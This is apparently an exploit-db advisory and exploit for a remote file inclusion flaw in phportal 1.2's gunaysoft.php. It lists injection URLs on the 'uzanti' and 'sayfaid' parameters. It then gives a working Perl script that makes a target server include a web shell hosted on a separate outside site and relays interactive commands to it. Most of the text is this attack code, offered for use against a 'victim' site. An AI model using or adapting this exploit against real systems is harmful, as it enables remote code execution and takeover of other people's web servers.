# Tilte: phportal_1.2 (gunaysoft.php) Remote File Include Vulnerability # Author..................: [Ma3sTr0-Dz] # Location ...............: [ALGERIA] # Software ...............: [phportal_1.2] # Impact..................: [Remote] # Advisory ...............: [exploit-db.com] # Site Software ..........: [http://sourceforge.net/project/showfiles.php?group_id=205263] # Sptnx ..................: [Www.Sec4ever.Com Work Group & Members .] # Vulnerability: Remote File Inclusion Vulnerability # Part Expl0it & Bug Codes : --- http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell] http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell] http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell] --- Exploit Perl : --- #!/usr/bin/perl use LWP::UserAgent; use LWP::Simple; $target = @ARGV[0]; $shellsite = @ARGV[1]; $shellcmd = @ARGV[2]; $file = "sablonlar/gunaysoft/gunaysoft.php?uzanti="; if(!$target || !$shellsite) { usage(); } header(); print "Type 'exit' to quit"; print "[cmd]\$"; $cmd = <STDIN>; while ($cmd !~ "exit") { $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect."); $res = $xpl->request($req); $r = $res->content; $r =~ tr/[\n]/[ê]/; if (@ARGV[4] eq "-r") { print $r; } elsif (@ARGV[5] eq "-p") { # if not working change cmd variable to null and apply patch manually. $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc"; print q { } } else { print "[cmd]\$"; $cmd = <STDIN>; } } sub header() { print q { =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by : Ma3sTr0-Dz phportal.pl - Remote File Include Exploit o5m@hotmail.de sp TANX2: Www.Sec4ever.Com/home/ & Cmos_CLR =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= }; } sub usage() { header(); print q { =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Usage: perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p> <Target Website> - Path to target eg: www.victim.com <Shell Location> - Path to shell eg: http://site.com/r57.txt? <CMD Variable> - Shell command variable name eg: Pwd <r> - Show output from shell <p> - sablonlar/gunaysoft/gunaysoft.php Example: perl phportal.pl http://localhost/include http://localhost/r57.php cmd -r -p =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= }; exit(); }
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